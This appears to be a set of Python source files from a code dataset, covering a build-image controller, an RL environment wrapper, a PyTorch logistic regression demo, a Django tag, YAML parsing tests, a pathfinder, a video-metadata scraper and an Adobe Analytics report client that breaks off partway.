_IMAGE_MAPPING[current]\n path = os.path.join(base_path, constants.IMAGE_TYPE_TO_NAME[current])\n\n new_image = output_proto.images.add()\n new_image.path = path\n new_image.type = type_id\n\n\ndef Test(input_proto, output_proto):\n \"\"\"Run image tests.\n\n Args:\n input_proto (image_pb2.ImageTestRequest): The input message.\n output_proto (image_pb2.ImageTestResult): The output message.\n \"\"\"\n image_path = input_proto.image.path\n board = input_proto.build_target.name\n result_directory = input_proto.result.directory\n\n if not board:\n raise InvalidArgumentError('The build_target.name is required.')\n if not result_directory:\n raise InvalidArgumentError('The result.directory is required.')\n if not image_path:\n raise InvalidArgumentError('The image.path is required.')\n\n if not os.path.isfile(image_path) or not image_path.endswith('.bin'):\n raise InvalidArgumentError(\n 'The image.path must be an existing image file with a .bin extension.')\n\n output_proto.success = image.Test(board, result_directory,\n image_dir=image_path)\n","sub_path":"src/third_party/chromite/api/controller/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":4970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"642612489","text":"from osim.env import RunEnv\nfrom osim.http.client import Client\n\n\nGRADER_URL = 'http://grader.crowdai.org:1729'\n\n\nclass NIPS(object):\n\n def __init__(self, visualize=False, token=None):\n if token is None:\n self.remote_env = False\n self.env = RunEnv(visualize=visualize)\n else:\n self.remote_env = True\n self.token = token\n self.env = Client(GRADER_URL)\n\n @property\n def observation_space(self):\n return self.env.observation_space\n\n @property\n def action_space(self):\n return self.env.action_space\n\n def reset(self):\n if self.remote_env:\n ob = self.env.env_create(self.token)\n else:\n ob = self.env.reset()\n return ob\n\n def step(self, action):\n if self.remote_env:\n ob, reward, done, info = self.env.env_step(action.tolist(), True)\n else:\n ob, reward, done, info = self.env.step(action)\n return ob, reward, done, info\n\n def close(self):\n if self.remote_env:\n self.env.submit()\n else:\n self.env.close()\n\n","sub_path":"dev/nipsenv.py","file_name":"nipsenv.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"427582875","text":"\"\"\"Logistic Regression\nH(x) = P(X=1;W) = 1-P(X=0;W)\n\nweight Update via Gradient Descent\n\"\"\"\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as f\nimport torch.optim as optim\n\n\nclass BinaryClassifier(nn.Module):\n def __init__(self):\n super().__init__()\n self.linear = nn.Linear(2, 1)\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x):\n return self.sigmoid(self.linear(x))\n\n\nmodel = BinaryClassifier()\n\nx_data = [[1, 2], [2, 3], [3, 1], [4, 3], [5, 3], [6, 2]]\ny_data = [[0], [0], [0], [1], [1], [1]]\n\nx_train = torch.FloatTensor(x_data)\ny_train = torch.FloatTensor(y_data)\n\noptimizer = optim.SGD(model.parameters(), lr=1)\n\nepochs = 1000\nfor epoch in range(epochs + 1):\n # hypothesis = 1 / (1 + torch.exp(-(x_train.matmul(W) + b)))\n hypothesis = model(x_train)\n\n # losses = -(y_train * torch.log(hypothesis) + (1 - y_train) * torch.log(1 - hypothesis))\n # cost = losses.mean()\n cost = f.binary_cross_entropy(hypothesis, y_train)\n\n optimizer.zero_grad() # 0으로 초기화\n cost.backward() # back propagation\n optimizer.step()\n\n if epoch % 100 == 0:\n print(\"Epoch {:4d}/{} Cost: {:.6f}\".format(\n epoch, epochs, cost.item()\n ))\n","sub_path":"Pytorch/logistic_regression.py","file_name":"logistic_regression.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"254110301","text":"import re\n\nfrom django import template\nfrom django.conf import settings\nfrom django.contrib.sites.models import Site\n\nregister = template.Library()\n\n\n@register.simple_tag\ndef absolute_url(url):\n \"\"\"\n Generate absolute url from provided.\n \"\"\"\n\n if re.match(r'^(?:[a-z]+:)?//', url):\n return url\n\n site = Site.objects.get_current()\n scheme = settings.SITE_PROTOCOL\n\n if url.startswith('/'):\n url = url[1:]\n\n return '%s://%s/%s' % (scheme, site, url)\n","sub_path":"iwg_blog/utils/templatetags/tag_utils.py","file_name":"tag_utils.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"328417113","text":"import pytest\n\nfrom tests.utils import config_fixture\nfrom valohai_yaml import parse\n\nexample1_config = config_fixture('example1.yaml')\nexample2_config = config_fixture('example2.yaml')\nboolean_param_config = config_fixture('flag-param-example.yaml')\nmount_config = config_fixture('mount-example.yaml')\nendpoint_config = config_fixture('endpoint-example.yaml')\n\n\ndef test_parse_inputs(example2_config):\n config = example2_config\n step = config.steps['run training']\n assert len(step.inputs) == 5\n\n\ndef test_parse(example1_config):\n config = example1_config\n # test that we can access a step by name\n step = config.steps['run training']\n\n # test that we parsed all params\n parameters = step.parameters\n assert len(parameters) == 7\n # test that we can access them by name\n assert parameters['seed'].default == 1\n assert parameters['decoder-spec'].default == 'gauss'\n # test that their order is preserved\n assert list(parameters) == [\n 'num-epochs',\n 'seed',\n 'labeled-samples',\n 'unlabeled-samples',\n 'encoder-layers',\n 'denoising-cost-x',\n 'decoder-spec',\n ]\n\n # test that `get_step_by` works\n assert step == config.get_step_by(index=0)\n assert step == config.get_step_by(name='run training')\n assert step == config.get_step_by(image='busybox')\n assert not config.get_step_by(image='bdfaweq')\n assert not config.get_step_by()\n\n\ndef test_command_generation(example1_config):\n config = example1_config\n step = config.steps['run training']\n command = step.build_command({\n 'decoder-spec': 'foo bar\"\"\\'\"\\'\"; quux',\n })\n command = ' && '.join(command)\n # Check that, uh, things, are, um, quoted.\n assert \"--decoder-spec \\'foo bar\\\"\\\"\\'\\\"\\'\\\"\\'\\\"\\'\\\"\\'\\\"\\'\\\"; quux\\'\" in command\n # Check that the params are serialized in order\n last_offset = 0\n for param_name in step.parameters:\n try:\n param_offset = command.index(param_name)\n except ValueError: # not found? ok.\n continue\n assert param_offset > last_offset\n last_offset = param_offset\n assert last_offset # (test that the in-order test actually did something)\n\n\ndef test_command_override(example1_config):\n config = example1_config\n step = config.steps['run training']\n command = step.build_command({'decoder-spec': 'hello'}, command='asdf {params}')\n command = ' && '.join(command)\n assert command.startswith('asdf')\n assert '--decoder-spec hello' in command\n\n\ndef test_boolean_param_parse(boolean_param_config):\n step = boolean_param_config.steps['test']\n assert step.parameters['case-insensitive'].optional\n assert step.parameters['case-insensitive'].choices == (True, False)\n assert step.build_command({'case-insensitive': True}) == ['foo --case-insensitive']\n assert step.build_command({'case-insensitive': False}) == ['foo']\n\n\ndef test_mount_parse(mount_config):\n step = mount_config.steps['test']\n assert len(step.mounts) == 2\n\n\ndef test_endpoint_parse(endpoint_config):\n server_endpoint = endpoint_config.endpoints['server-endpoint']\n assert server_endpoint.image == 'python:3.6'\n assert server_endpoint.port == 1453\n assert server_endpoint.server_command == 'python run_server.py'\n wsgi_endpoint = endpoint_config.endpoints['wsgi-endpoint']\n assert wsgi_endpoint.description == 'predict digits from image inputs'\n assert wsgi_endpoint.image == 'gcr.io/tensorflow/tensorflow:1.3.0-py3'\n assert wsgi_endpoint.wsgi == 'predict_wsgi:predict_wsgi'\n assert len(wsgi_endpoint.files) == 1\n file = wsgi_endpoint.files[0]\n assert file.name == 'model'\n assert file.description == 'Model output file from TensorFlow'\n assert file.path == 'model.pb'\n\n\ndef test_unknown_parse():\n with pytest.raises(ValueError) as e:\n fail_config = '[{ city_name: Constantinople }]'\n parse(fail_config)\n assert e.value.args[0] == \"No parser for {'city_name': 'Constantinople'}\"\n","sub_path":"tests/test_parsing.py","file_name":"test_parsing.py","file_ext":"py","file_size_in_byte":4005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"312196781","text":"import math\n\nfrom environment import Arena\nfrom environment.element.object.Wall import Wall\nfrom pathFinder.PathFinder import PathFinder\nfrom util.Direction import Direction\n\n\nclass PersonalPathFinder(PathFinder):\n\n def __init__(self, arena: Arena):\n super(PersonalPathFinder, self).__init__(arena)\n\n def find_path(self, beginning: (int, int), end: (int, int)):\n return self.__get_path(beginning,end,[],[])\n\n\n def __get_path(self,beginning: (int, int), end: (int, int), current_path: [(int, int)], dead_end: [(int, int)]):\n if beginning == end:\n return current_path\n\n for direction in Direction:\n movement = beginning[0] + direction.value[0], beginning[1] + direction.value[1]\n if PersonalPathFinder.__is_closer(beginning, movement, end):\n if not isinstance(self.arena.get_element_at(*movement), Wall) and movement not in dead_end:\n current_path.append(beginning)\n return self.__get_path(movement, end, current_path, dead_end)\n else:\n for new_direction in Direction:\n if new_direction != direction:\n new_movement = beginning[0] + new_direction.value[0], beginning[1] + new_direction.value[1]\n previous_step = current_path[-1]\n if new_movement != previous_step and \\\n not isinstance(self.arena.get_element_at(*new_movement), Wall) and \\\n new_movement not in dead_end:\n\n current_path.append(beginning)\n return self.__get_path(new_movement, end, current_path, dead_end)\n else:\n dead_end.append(beginning)\n beginning = current_path.pop()\n return self.__get_path(beginning, end, current_path, dead_end)\n\n @staticmethod\n def __is_closer(current_pos: (int, int), new_pos: (int, int), end_pos: (int, int)):\n return PersonalPathFinder.__get_distance(new_pos, end_pos) < PersonalPathFinder.__get_distance(current_pos,\n end_pos)\n\n @staticmethod\n def __get_distance(first_pos: (int, int), second_pos: (int, int)):\n return math.sqrt((second_pos[0] - first_pos[0]) ** 2 + (second_pos[1] - first_pos[1]) ** 2)\n","sub_path":"pathFinder/PersonalPathFinder.py","file_name":"PersonalPathFinder.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"343968115","text":"import PAsearchSites\nimport PAutils\nfrom datetime import datetime\nfrom datetime import date\nimport math\n\n\ndef search(results, lang, siteNum, searchData):\n\n # if we have a scene date, we can use the 'Newest scenes' pages to get a match\n if searchData.date:\n\n # there are 99 scenes per page starting with today on page 1,\n # so let's try to determine the page on which we will find a match\n # though this can be a bit random with older scenes\n\n searchDateObj = dateFromIso(searchData.date)\n delta = date.today() - searchDateObj\n searchPage = max(math.ceil(float(delta.days) / 99), 1)\n\n # the first word in the title is usually a name\n searchName = searchData.title.lower().split()[0]\n\n # Log('Scene date: %s, Days delta: %d, Page: %d' % (searchData.date, delta.days, searchPage))\n\n searchUrl = 'https://www.pornworld.com/new-videos/%d'\n dateNotFound = True\n\n while dateNotFound:\n req = PAutils.HTTPRequest(searchUrl % searchPage)\n\n if req.status_code != 200:\n Log('Page %d bad request' % searchPage)\n break\n\n searchResults = HTML.ElementFromString(req.text)\n\n dateResults = searchResults.xpath(\"//div[@class='card-scene__time']/div[@class='label label--time'][2]\")\n\n firstDateObj = dateFromIso(dateResults[0].text_content().strip())\n if searchDateObj > firstDateObj and searchPage > 1:\n searchPage = searchPage - 1\n continue\n\n lastDateObj = dateFromIso(dateResults[-1].text_content().strip())\n if searchDateObj < lastDateObj:\n searchPage = searchPage + 1\n continue\n\n dateNotFound = False\n for searchResult in searchResults.xpath(\"//div[contains(concat(' ',normalize-space(@class),' '),' card-scene ')]\"):\n\n titleNoFormatting = searchResult.xpath(\".//div[@class='card-scene__text']/a\")[0].text_content().strip()\n sceneDate = searchResult.xpath('.//div[@class=\"label label--time\"]')[1].text_content().strip()\n sceneDateObj = dateFromIso(sceneDate)\n\n # get the difference in days between the search target and the current scene\n daysDiff = abs((searchDateObj - sceneDateObj).days)\n\n # let's allow scenes +/- two days of the target date as sometimes scenes get re-dated on the site\n if daysDiff < 3:\n\n url = searchResult.xpath('.//a/@href')[0]\n curID = PAutils.Encode(url)\n\n # take off some points if the date is not a precise match\n score = 100 - daysDiff * 10\n\n # try to match the first word/name in the title\n if searchName not in titleNoFormatting.lower():\n # take off some points if we don't match the title search params\n score = score - Util.LevenshteinDistance(searchData.title.lower(), titleNoFormatting.lower())\n\n Log('Scene: %s %s (%s%%)' % (sceneDate, titleNoFormatting, score))\n\n # scene names can be obscure so output the date too\n name = '%s %s' % (sceneDate, titleNoFormatting)\n\n results.Append(MetadataSearchResult(id='%s|%d' % (curID, siteNum), name=name, score=score, lang=lang))\n\n # if we have a date, there's a far better chance of a decent match than the title search, so get out now\n return results\n\n sceneID = searchData.title.split(' ', 1)[0]\n if unicode(sceneID, 'UTF-8').isdigit() and len(sceneID) > 3: # don't match things like '2 girls do something...'\n searchData.title = searchData.title.replace(sceneID, '', 1).strip()\n else:\n sceneID = None\n\n if sceneID:\n url = PAsearchSites.getSearchBaseURL(siteNum) + '/watch/' + sceneID\n req = PAutils.HTTPRequest(url)\n detailsPageElements = HTML.ElementFromString(req.text)\n\n curID = PAutils.Encode(url)\n titleNoFormatting = getTitle(detailsPageElements)\n\n results.Append(MetadataSearchResult(id='%s|%d' % (curID, siteNum), name=titleNoFormatting, score=100, lang=lang))\n\n # if we get to here, results can be extremely sketchy...\n else:\n searchData.encoded = searchData.title.replace(' ', '+')\n req = PAutils.HTTPRequest(PAsearchSites.getSearchSearchURL(siteNum) + searchData.encoded)\n searchResults = HTML.ElementFromString(req.text)\n\n if not searchResults.xpath('//h1[contains(@class, \"section__title\")]'):\n # if there is only one result returned by the search function it automatically redirects to the video page\n titleNoFormatting = getTitle(searchResults)\n\n url = searchResults.xpath('//a[contains(@class, \"__pagination_button--more\")]/@href')[0]\n curID = PAutils.Encode(url)\n\n score = 100 - Util.LevenshteinDistance(searchData.title.lower(), titleNoFormatting.lower())\n\n results.Append(MetadataSearchResult(id='%s|%d' % (curID, siteNum), name='%s [%s]' % (titleNoFormatting, PAsearchSites.getSearchSiteName(siteNum)), score=score, lang=lang))\n return results\n\n for searchResult in searchResults.xpath('//div[@class=\"card-scene__text\"]'):\n titleNoFormatting = searchResult.xpath('./a')[0].text_content().strip()\n\n url = searchResult.xpath('./a/@href')[0]\n curID = PAutils.Encode(url)\n\n score = 100 - Util.LevenshteinDistance(searchData.title.lower(), titleNoFormatting.lower())\n\n results.Append(MetadataSearchResult(id='%s|%d' % (curID, siteNum), name='%s [%s]' % (titleNoFormatting, PAsearchSites.getSearchSiteName(siteNum)), score=score, lang=lang))\n\n return results\n\n\ndef dateFromIso(dateString):\n return datetime.strptime(dateString, '%Y-%m-%d').date()\n\n\ndef update(metadata, lang, siteNum, movieGenres, movieActors, art):\n metadata_id = str(metadata.id).split('|')\n sceneURL = PAutils.Decode(metadata_id[0])\n if 'http' not in sceneURL:\n sceneURL = PAsearchSites.getSearchBaseURL(siteNum) + sceneURL\n req = PAutils.HTTPRequest(sceneURL)\n detailsPageElements = HTML.ElementFromString(req.text)\n\n # Title\n metadata.title = getTitle(detailsPageElements)\n\n # Summary\n description = detailsPageElements.xpath('//div[text()=\"Description:\"]/following-sibling::div')\n if description:\n metadata.summary = description[0].text_content().strip()\n\n # Studio\n metadata.studio = 'PornWorld'\n\n # Tagline / Collection\n metadata.collections.clear()\n tagline = PAsearchSites.getSearchSiteName(siteNum)\n metadata.tagline = tagline\n metadata.collections.add(tagline)\n\n # Release Date\n date = detailsPageElements.xpath('//i[contains(@class, \"bi-calendar\")]')\n if date:\n date_object = parse(date[0].text_content().strip())\n metadata.originally_available_at = date_object\n metadata.year = metadata.originally_available_at.year\n\n # Genres\n movieGenres.clearGenres()\n for genreLink in detailsPageElements.xpath('//div[contains(@class, \"genres-list\")]//a'):\n genreName = genreLink.text_content().strip()\n\n movieGenres.addGenre(genreName)\n\n # Actors\n movieActors.clearActors()\n for actorLink in detailsPageElements.xpath('//h1[contains(@class, \"watch__title\")]//a'):\n actorName = actorLink.text_content().strip()\n actorPhotoURL = ''\n # actorPhotoURL = 'http:' + actorLink.get('data-src')\n\n movieActors.addActor(actorName, actorPhotoURL)\n\n # Posters\n art.append(detailsPageElements.xpath('//video/@data-poster')[0])\n\n Log('Artwork found: %d' % len(art))\n for idx, posterUrl in enumerate(art, 1):\n if not PAsearchSites.posterAlreadyExists(posterUrl, metadata):\n try:\n image = PAutils.HTTPRequest(posterUrl)\n im = StringIO(image.content)\n resized_image = Image.open(im)\n width, height = resized_image.size\n # Add the image proxy items to the collection\n if width > 1:\n # Item is a poster\n metadata.posters[posterUrl] = Proxy.Media(image.content, sort_order=idx)\n if width > 100:\n # Item is an art item\n metadata.art[posterUrl] = Proxy.Media(image.content, sort_order=idx)\n except:\n pass\n\n return metadata\n\n\ndef getTitle(htmlElements):\n titleNoFormatting = htmlElements.xpath('//title')[0].text_content().strip()\n\n return re.sub(r' - PornWorld$', '', titleNoFormatting)\n","sub_path":"Contents/Code/networkPornWorld.py","file_name":"networkPornWorld.py","file_ext":"py","file_size_in_byte":8707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"22501388","text":"import base64\nimport hashlib\nimport json\nimport logging\nimport random\n\nimport datetime\nimport pandas as pd\nimport pytz\nimport time\nfrom dateutil.parser import parse\nimport numpy as np\nfrom pandas.io.json import json_normalize\n\n#from adobe.constants import API_HOST, PATH, CONFIG_FILE, HANA_CONFIG_FILE, SCRIPT_FOLDER_NAME\nfrom constants import API_HOST, PATH, CONFIG_FILE, HANA_CONFIG_FILE, SCRIPT_FOLDER_NAME\nfrom base.base_api_interface import BaseApiInterface\nfrom base.db_wrapper import PyHdbWrapper\nfrom base.utils import Utils\n\nnonce_seed = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '0', 'a', 'b', 'c',\n 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p',\n 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C',\n 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P',\n 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\n\nlogger = logging.getLogger(__name__)\n\n\nclass AdobeBase(BaseApiInterface):\n def __init__(self, kargs):\n logger.info(\"class initiated\")\n # self.metrics = kargs['metric-list']\n # self.elements = kargs['element-list']\n # self.element_names = kargs['element-names']\n # self.segments = kargs['segment-list']\n self.da_path = kargs['da-path']\n self.date_from = kargs['date-from']\n self.date_to = kargs['date-to']\n self.date_granularity = kargs['date-granularity']\n self.sleep_time = float(kargs['sleep-time'])\n self.schema = kargs['schema-name']\n\n def get_endpoint_url(self, query):\n return API_HOST + PATH + query\n\n def get_payload(self, dateFrom, dateTo, dateGranularity):\n return {\n 'reportDescription': {\n 'reportSuiteID': 'servn-servicenow.com-prod', # servn-servicenow.com-prod 'servn-geneva-prod'\n 'dateFrom': dateFrom,\n 'dateTo': dateTo,\n 'dateGranularity': dateGranularity,\n 'locale': 'en_US',\n 'metrics': [\n {\n 'id': 'uniquevisitors'\n },\n {\n 'id': 'visits'\n },\n {\n 'id': 'pageviews'\n },\n {\n 'id': 'bounces'\n },\n {\n 'id': 'cm5509_576af356408496930352c481'\n },\n {\n 'id': 'event89'\n },\n {\n 'id': 'event17'\n },\n {\n 'id': 'cm5509_59e1193408051050b2f3ec64'\n },\n {\n 'id': 'totalvisitorsweekly'\n },\n {\n 'id': 'entries'\n },\n {\n 'id': 'totaltimespent'\n },\n\n ],\n 'elements':[\n\n {\n 'id': 'eVar48',\n 'classification': 'SurfID',\n\n },\n\n {\n 'id': 'evar2',\n # 'classification': 'Page URL',\n 'name': 'Page URL c02'\n\n },\n\n # {\n # 'id': 'eVar46',\n # 'classification': 'Company Name',\n #\n # },\n # {\n # 'id': 'lasttouchchannel',\n # # \"name\": \"Last Touch Marketing Channel\"\n #\n # },\n # {\n # 'id': 'eVar48',\n # 'classification': 'SurfID',\n #\n # },\n # {\n # 'id':'evar2',\n # #'classification': 'Page URL',\n # 'name': 'Page URL c02'\n #\n # },\n # {\n # 'id': 'evar51',\n # 'name': 'Internal Search Term c51',\n # },\n # {\n # 'id': 'evar19',\n # 'name': 'Internal Campaign ID c19',\n # }\n #]\n\n ],\n 'segments': [\n # {\n # #'id': 's300007365_56d8b42ce4b0735cde722317'\n # 'id': 's300007365_5b1ee51fbef0d34e1bda4081'\n # },\n # {\n # 'id':'s300007365_5c241d2b120ebf0fa5ab523e',\n # },\n {\n 'id': 's300007365_5c241d4e9bfec133d16ebefd'\n }\n\n ]\n }\n }\n\n def get_header(self, username, digest, nonce_b, iso_time):\n header_args = 'UsernameToken Username=\"' + username + \\\n '\", PasswordDigest=\"' + digest + \\\n '\", Nonce=\"' + nonce_b + \\\n '\", Created=\"' + iso_time + \\\n '\"'\n header_args = bytes(header_args, 'utf-8')\n\n return {\n 'X-WSSE': header_args\n }\n\n def get_unique_connection_parameters(self, api_secret):\n\n nonce = ''.join(random.sample(nonce_seed, 16))\n nonce_b = base64.b64encode(nonce.encode('ascii'))\n\n date = datetime.datetime.now(tz=pytz.utc)\n date = date.astimezone(pytz.timezone('US/Pacific'))\n\n iso_time = date.strftime(\"%Y-%m-%dT%H:%M:%S\")\n # iso_time = time.strftime(\"%Y-%m-%dT%H:%M:%S\")\n\n # This is the process to create digest which is used in header\n passwd = nonce + iso_time + api_secret\n passwd = passwd.encode()\n hash_new = hashlib.sha1(passwd).digest()\n digest = base64.b64encode(hash_new)\n return nonce_b.decode('ascii'), iso_time, digest.decode('ascii')\n\n def response_handler(self, data_df):\n db_obj = PyHdbWrapper()\n cursor, connection = db_obj.connect_hana(\n Utils.get_file_path(self.da_path, [SCRIPT_FOLDER_NAME, HANA_CONFIG_FILE]), 'HANA_ENV')\n ''' Truncate staging table before inserting records'''\n delete_page_url = db_obj.get_delete_query(self.schema + '.STG_ADOBE_CSC_DAILY')\n db_obj.execute_sql(cursor, connection, delete_page_url, '', 'DELETE')\n\n # Extract Date will be used as a bookmark for loading data into HANA\n extract_date = datetime.datetime.today()\n\n for index, row in data_df.iterrows(): # Outer Loop for Day Specific data\n table = row.iloc[0] # Table is of type Dictionary\n source_date = str(datetime.date(table['year'], table['month'], table['day']))\n source_date = datetime.datetime.strptime(source_date, \"%Y-%m-%d\")\n breakdown = (table['breakdown']) # Breakdown is type of list\n for i in breakdown:\n if 'breakdown' in i.keys():\n country = i['name']\n # print(i['breakdownTotal'])\n temp = i['breakdown']\n # for i in breakdown:\n # if 'breakdown' in i.keys():\n # country = i['name']\n # # print(i['breakdownTotal'])\n # temp = i['breakdown']\n for i in temp:\n counts = i['counts']\n pageviews = counts[0]\n visits = counts[1]\n uniquevisitors = counts[2]\n bouncerate = counts[3]\n averageTimeSpentOnSite = counts[4]\n url = i['name']\n print(source_date, country, url + '\\n' + pageviews, visits, uniquevisitors, bouncerate)\n column_name = [\"PERIOD_DATE\", \"GRANULARITY\", \"COUNTRY\", \"URL\"\n , \"PAGE_VIEWS_COUNT\", \"PAGE_VISITS_COUNT\", \"UNIQUE_VISITOR_COUNT\"\n , \"BOUNCE_RATE_%%\", \"AVG_TIME_SPENT_ON_PAGE\", \"EXTRACT_DATE\"]\n insert_query = db_obj.get_insert_query(self.schema + \".STG_ADOBE_CSC_DAILY\",\n column_name)\n\n values = [source_date, self.date_granularity, country, url, pageviews, visits,\n uniquevisitors, bouncerate, averageTimeSpentOnSite, extract_date]\n print(values)\n\n\n db_obj.execute_sql(cursor, connection, insert_query, values, 'INSERT')\n\n upsert_statement = \"UPSERT \\\"\" + self.schema + \"\\\".\\\"ADOBE_CSC_DAILY\\\" \\\n SELECT * FROM \\\"\" + self.schema + \"\\\".\\\"STG_ADOBE_CSC_DAILY\\\"\"\n db_obj.execute_sql(cursor, connection, upsert_statement, '', 'UPSERT')\n\n #\n # def recursive_fun(self, element):\n # breakdowndf = pd.concat([breakdowndf, pd.DataFrame(element[\"breakdown\"])], ignore_index=True)\n\n # def iterdict(d):\n # for k, v in d.items():\n # if isinstance(v, list):\n # iterdict(v)\n # else:\n # print (k, \":\", v)\n\n def iterdict(self,d, breakdowndf):\n print (\"Data is:{}\".format(d))\n for element in d:\n #if element.has_key('breakdown'):\n #print(\"Element is: {}\".format(element))\n breakdowndf = pd.concat([breakdowndf, pd.DataFrame(element)], ignore_index=True)\n if \"breakdown\" in element:\n breakdowndf = pd.concat([breakdowndf, pd.DataFrame(element[\"breakdown\"])], ignore_index=True)\n for list_element in element[\"breakdown\"]:\n if isinstance(list_element.get(\"breakdown\",None), list):\n #print (list_element[\"breakdown\"])\n self.iterdict(list_element[\"breakdown\"], breakdowndf)\n #print (breakdowndf)\n\n return breakdowndf\n\n\n # def date_conversion(self, column_value):\n # if (column_value is not None) and (column_value is not '') and (column_value is not pd.np.nan):\n # column_value_list = list(column_value)\n # if column_value_list[-6] == '.':\n # temp_datetime = datetime.datetime.strptime(column_value, '%a. %d %b. %Y').strftime('%Y-%m-%d')\n # else:\n # temp_datetime = datetime.datetime.strptime(column_value, '%a. %d %b %Y').strftime('%Y-%m-%d')\n # return temp_datetime\n # else:\n # return None\n\n def date_conversion(self, column_value):\n if (column_value is not None) and (column_value is not '') and (column_value is not pd.np.nan):\n\n value = column_value.split(' - ')\n column_value_list_start = list(value[0])\n if column_value_list_start[-6] == '.':\n temp_datetime = datetime.datetime.strptime(value[0], '%a. %d %b. %Y').strftime('%Y-%m-%d')\n\n else:\n temp_datetime = datetime.datetime.strptime(value[0], '%a. %d %b %Y').strftime('%Y-%m-%d')\n\n return temp_datetime\n\n else:\n return None\n\n\n def main(self):\n '''\n This function will be called from the main.py file and contains the\n logic to fetch data from source and will save it to designation.\n :return:\n '''\n '''\n from_ini function will read the configuration file as per given section name and key name \n and will provide dict of configuration parameters.\n '''\n #print (\"Date granularity is: {}\".format(self.date_granularity))\n adobe_config = Utils.from_ini(\n Utils.get_file_path(\n self.da_path,\n [SCRIPT_FOLDER_NAME, CONFIG_FILE]),\n 'Adobe_Analytics',\n ('username', 'api_secret'))\n\n '''\n Getting end point url \n '''\n query_url = self.get_endpoint_url('method=Report.Queue')\n print (\"\\n\")\n print (query_url)\n print (\"\\n\")\n\n '''\n Getting payload to be passed with the api\n '''\n payload = json.dumps(self.get_payload(self.date_from, self.date_to, self.date_granularity))\n print (\"------------------------------------\")\n print (\"Payload is:\")\n print (payload)\n print (\"------------------------------------\")\n print (\"\\n\")\n '''\n Preparing parameters for passing in header with api for authentication\n '''\n nonce_b, iso_time, digest = self.get_unique_connection_parameters(adobe_config['api_secret'])\n\n '''\n Get header\n '''\n head = self.get_header(adobe_config['username'], digest, nonce_b, iso_time)\n\n print (\"------------------------------------\")\n print (\"Header is:\")\n print (head)\n print (\"------------------------------------\")\n print (\"\\n\")\n\n\n '''\n Calling api for preparing reports\n '''\n report_queue_api_response = Utils.send_request('POST', query_url, payload, head)\n\n if report_queue_api_response.status_code != 200:\n logger.error(report_queue_api_response.text)\n raise Exception(report_queue_api_response.reason)\n\n report_queue_response_body = report_queue_api_response.text.encode('ascii')\n temp_var = report_queue_response_body.split(b':')\n report_id = temp_var[1].replace(b'}', b'')\n # print(report_id)\n\n '''\n Section - 2: Get data based on report developed and save the JSON reply in shared folder \n '''\n\n '''\n Developing API URL for retrieving\n '''\n query_url = self.get_endpoint_url('method=Report.Get') # 'method=Report.GetMetrics'\n\n # The body of the API url is enclosed as post_params\n bodydata = {\n 'reportID': '' + report_id.decode('ascii') + ''\n }\n payload = json.dumps(bodydata)\n\n counter_error = 0\n while (counter_error == 0):\n # Using sleep method to give enough time to get the reort ready to pull the data else it will throw\n # \"Report not ready\"\n print(\"Start sleep time \" + time.strftime(\"%X\"))\n print (\"\\n\")\n time.sleep(self.sleep_time)\n\n '''\n Get connection parameter for getting reports data\n and get header\n '''\n nonce_b, iso_time, digest = self.get_unique_connection_parameters(adobe_config['api_secret'])\n head = self.get_header(adobe_config['username'], digest, nonce_b, iso_time)\n\n # logger\n\n '''\n Call api to get reports\n '''\n api_response = Utils.send_request('POST', query_url, payload, head)\n if api_response.status_code != 200:\n print(api_response)\n continue\n\n try:\n response_body = json.loads(api_response.text)\n print (\"------------------------------------\")\n print (\"API Response is:\")\n print (\"\\n\")\n print (\"Response is: {}\".format(response_body))\n print (\"------------------------------------\")\n print (\"\\n\")\n\n\n metricsdf = pd.DataFrame(response_body[\"report\"][\"metrics\"])\n datadf = pd.DataFrame(response_body[\"report\"][\"data\"])\n outerdf = pd.DataFrame()\n #breakdowndf_2 = pd.DataFrame()\n\n for breakdown_data in response_body[\"report\"][\"data\"]:\n for element in breakdown_data[\"breakdown\"]:\n innerdf = pd.DataFrame()\n final_data = {}\n final_data[\"ITEM\"] = []\n final_data[\"ACCOUNT_NUMBER\"] = []\n final_data[\"UNIQUE_VISITORS\"] = []\n final_data[\"VISITS\"] = []\n final_data[\"PAGE_VIEWS\"] = []\n final_data[\"BOUNCES\"] = []\n final_data[\"TIME_SPENT_ON_PAGE_(MIN)\"] = []\n final_data[\"E89_VIDEO_VIEWS\"] = []\n final_data[\"E17_FORM_SUCCESS\"] = []\n final_data[\"FORM_SUBMISSIONS\"] = []\n final_data[\"TOTAL_WEEKLY_UNIQUE_VISITORS\"] = []\n final_data[\"ENTRIES\"] = []\n final_data[\"TOTAL_TIME_SPENT\"] = []\n final_data[\"START_DATE_OF_WEEK\"] = []\n final_data[\"GRANULARITY\"] = []\n final_data[\"START_DATE_OF_WEEK\"].append(breakdown_data[\"name\"])\n final_data[\"GRANULARITY\"].append(self.date_granularity)\n final_data[\"ACCOUNT_NUMBER\"].append(element[\"name\"])\n if \"breakdown\" in element:\n for pageurl in element[\"breakdown\"]:\n final_data[\"ITEM\"].append(pageurl[\"name\"])\n final_data[\"UNIQUE_VISITORS\"].append(pageurl[\"counts\"][0])\n final_data[\"VISITS\"].append(pageurl[\"counts\"][1])\n final_data[\"PAGE_VIEWS\"].append(pageurl[\"counts\"][2])\n 